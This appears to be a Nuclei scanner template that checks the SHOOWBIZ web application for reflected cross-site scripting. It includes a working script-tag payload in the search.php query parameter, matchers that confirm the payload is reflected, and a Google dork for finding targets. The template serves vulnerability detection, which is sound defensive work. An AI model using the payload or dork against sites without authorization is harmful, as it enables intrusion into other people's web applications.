id: shoowbiz-xss

info:
  name: SHOOWBIZ - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users.
  reference:
    - https://www.exploitalert.com/view-details.html?id=36000
  metadata:
    verified: true
    max-request: 1
    google-drok: inurl:"search.php?q="
  tags: shoowbiz,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/search.php?q=%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<ScRipT>alert(document.domain);</ScRipT>")'
          - 'contains(body, "Search result in")'
        condition: and

# digest: 4a0a00473045022007cbad8036ee021fb3e4341614c42f37187fffa37818ce910e988874f0b7efae022100d1c2c05af11ac3ff8c70903dac7fddc989df0a2cd515de03c8feea96988d838f:922c64590222798bb761d5b6d8e72950
